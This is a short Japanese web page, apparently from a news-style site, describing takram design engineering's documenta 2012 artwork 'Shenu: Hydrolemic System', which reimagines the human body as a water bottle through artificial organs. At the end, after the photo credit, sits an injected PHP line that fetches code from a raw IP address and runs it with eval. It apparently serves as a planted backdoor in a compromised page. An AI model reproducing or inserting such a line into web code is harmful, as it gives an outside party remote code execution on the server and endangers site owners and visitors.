デイリープレス

「Shenu Hydrolemic System」

2012年に開催された、ドクメンタ(ドイツ、カッセルで5年おきに開催される現代アートの祭展)に出展されたアート作品「Shenu: Hydrolemic System」
“100年後の未来で使われる水筒とは?”という問いに対して、“ごく少量の水分摂取で生命を保てる人工臓器システム”という人体を水筒化するアイデアをアート作品化。
本作を発表した、takram design engineeringは、デザインとエンジニアリングの二つの視点を活かした多角的なアプローチで、インタラクティブなアート作品からソフトウェア、ハードウェアまで幅広い製品を手掛けるデザインエンジニアリングファーム。

Photo: Naohiro Tsukada

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>